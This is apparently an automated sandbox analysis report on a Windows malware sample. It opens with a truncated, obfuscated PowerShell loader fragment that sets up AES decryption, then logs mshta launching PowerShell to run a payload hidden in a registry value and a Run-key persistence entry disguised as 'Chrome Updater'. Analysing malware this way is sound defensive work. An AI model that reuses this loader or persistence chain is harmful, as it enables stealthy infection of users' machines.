iT93g(0x74<#AgF8G#>,0x52<#sotVh#>,0x6B<#IJTfo#>,0x58<#aq0EZ#>,0x43<#lRyb0#>,0x36<#LDjCA#>,0x6A<#DRhTQ#>,0x2B<#Nxos5#>,0x34<#AjnVW#>,0x5A<#vkssP#>,0x6F<#Nr7dJ#>,0x52<#lsoI1#>,0x59<#pErVd#>,0x62<#tlAPZ#>,0x79<#kBIJZ#>,0x47<#HncF5#>,0x70<#hU1xu#>,0x6F<#TUEJh#>,0x4D<#cJg0H#>,0x45<#w2R2e#>,0x75<#QkdTi#>,0x6B<#LjyD9#>,0x6B<#EPiNN#>,0x43<#YN4lF#>,0x59<#bh0r2#>,0x46<#bfRBe#>,0x42<#OWjkm#>,0x51<#D0iPg#>,0x34<#pgAJc#>,0x2F<#OkTmn#>,0x46<#k7qw7#>,0x79<#ntwbA#>,0x64<#lRwjs#>,0x34<#lp8kK#>,0x58<#gppFR#>,0x4F<#zhqOk#>,0x4B<#xLpYw#>,0x4E<#Qpxm0#>,0x58<#QDHOx#>,0x78<#bubbt#>,0x2B<#gmscA#>,0x45<#CSle7#>,0x67<#LDi0E#>,0x3D<#bmXwZ#>); $qBAgs = iT93g(0x4E<#C2Vu0#>,0x47<#diaRv#>,0x30<#MGPf7#>,0x52<#QdMXt#>,0x63<#AESom#>,0x50<#NfQKQ#>,0x37<#uWoBq#>,0x49<#mQ8mb#>,0x36<#Z2Tts#>,0x7A<#GxC3u#>,0x75<#DZACY#>,0x45<#yjqHj#>,0x65<#DRQB2#>,0x65<#tbNzN#>,0x6F<#Cek6P#>,0x32<#Hvj6e#>,0x46<#YcXZM#>,0x6F<#YWlmr#>,0x77<#Ik0CX#>,0x72<#KlS1z#>,0x34<#jkNpr#>,0x51<#dzExQ#>,0x3D<#KAunG#>,0x3D<#f40yY#>); $ZXcf8 = 
iT93g(0x53<#b0lHD#>,0x6F<#YnhiC#>,0x66<#bdsGx#>,0x74<#tOssn#>,0x77<#hRyWf#>,0x61<#I0N5w#>,0x72<#PudcT#>,0x65<#r8GlO#>,0x5C<#wRgut#>,0x4D<#lRnzO#>,0x69<#SMHLu#>,0x63<#LCPm3#>,0x72<#galvu#>,0x6F<#oAPw7#>,0x73<#uIGer#>,0x6F<#SvDmv#>,0x66<#tMXra#>,0x74<#EnRsF#>,0x5C<#qtdsl#>,0x57<#aquA7#>,0x69<#lC02U#>,0x6E<#LGneX#>,0x64<#X9m0B#>,0x6F<#VC3Vo#>,0x77<#HtgrI#>,0x73<#IoY3L#>); $hBkVc = iT93g(0x73<#jBCoD#>,0x31<#rVfXN#>,0x55<#zAwUn#>,0x6E<#qHnrL#>,0x62<#YwZWy#>); $B8Dta = tiw6l(0x00<#A7hB6#>,0x00<#O0RD9#>,0x00<#jXCyJ#>,0x00<#OM184#>); $iSxCm = tiw6l(0x45<#OOD4N#>,0x00<#ImgSK#>,0x00<#Ylexb#>,0x00<#UUo0E#>); $l8XQf = tiw6l(0x03<#CQs75#>,0x00<#GS7w6#>,0x00<#gTbLR#>,0x00<#o3nyw#>); $kzu3X = $null; function S2qwV($ti34n) {Invoke-Expression -Verbose -Debug -WarningAction Inquire 'Bqr$BqrEBqrLBqrpBqrtBqrFBqr=Bqr[BqrSBqryBqrsBqrtBqreBqrmBqr.BqrSBqreBqrcBqruBqrrBqriBqrtBqryBqr.BqrCBqrrBqryBqrpBqrtBqroBqrgBqrrBqraBqrpBqrhBqryBqr.BqrABqreBqrsBqr]Bqr:Bqr:BqrCBqrrBqreBqraBqrtBqreBqr(Bqr)Bqr;Bqr'.Replace('Bqr', ''); Invoke-Expression -WarningAction Inquire -Debug -InformationAction Ignore 'l3m$l3mEl3mLl3mpl3mtl3mFl3m.l3mMl3mol3mdl3mel3m=l3m[l3mSl3myl3msl3mtl3mel3mml3m.l3mSl3mel3mcl3mul3mrl3mil3mtl3myl3m.l3mCl3mrl3myl3mpl3mtl3mol3mgl3mrJump to behavior
                      Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command $r = [Microsoft.Win32.Registry]::CurrentUser.OpenSubKey('Software\Microsoft\Windows'); iex $r.GetValue('elnlg')
                      Source: Yara match File source: 8.2.powershell.exe.2255f9c0000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 8.2.powershell.exe.22557635510.2.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 8.2.powershell.exe.2255f9c0000.7.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 8.2.powershell.exe.22557635510.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 00000008.00000002.2591788897.00000225487FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000008.00000002.2797885450.000002255F9C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000008.00000002.2741051863.00000225574F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: Process Memory Space: powershell.exe PID: 5964, type: MEMORYSTR
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_00007FF7C02243DE push ds; iretd 6_2_00007FF7C02243DF
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_00007FF7C022E8DA push ebx; retn 0009h 6_2_00007FF7C022E90A
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FF7C0250160 push edx; retf 8_2_00007FF7C025475B
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FF7C02443DE push ds; iretd 8_2_00007FF7C02443DF
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FF7C02510F0 push eax; ret 8_2_00007FF7C025115C

                      Boot Survival

                      Source: C:\Windows\System32\wbem\WmiPrvSE.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Chrome Updater mshta vbscript:Execute("D2h=strreverse(""llehS.tpircsW""):Set XAr=CreateObject(D2h):XAr.Run ""powershell.exe -Command $r = [Microsoft.Win32.Registry]::CurrentUser.OpenSubKey('Software\Microsoft\Windows'); iex $r.GetValue('elnlg')"", 0:Close")
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Chrome Updater

                      Hooking and other Techniques for Hiding and Protection

                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe:Zone.Identifier read attributes | delete
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exe Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows s1Unb
                      Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
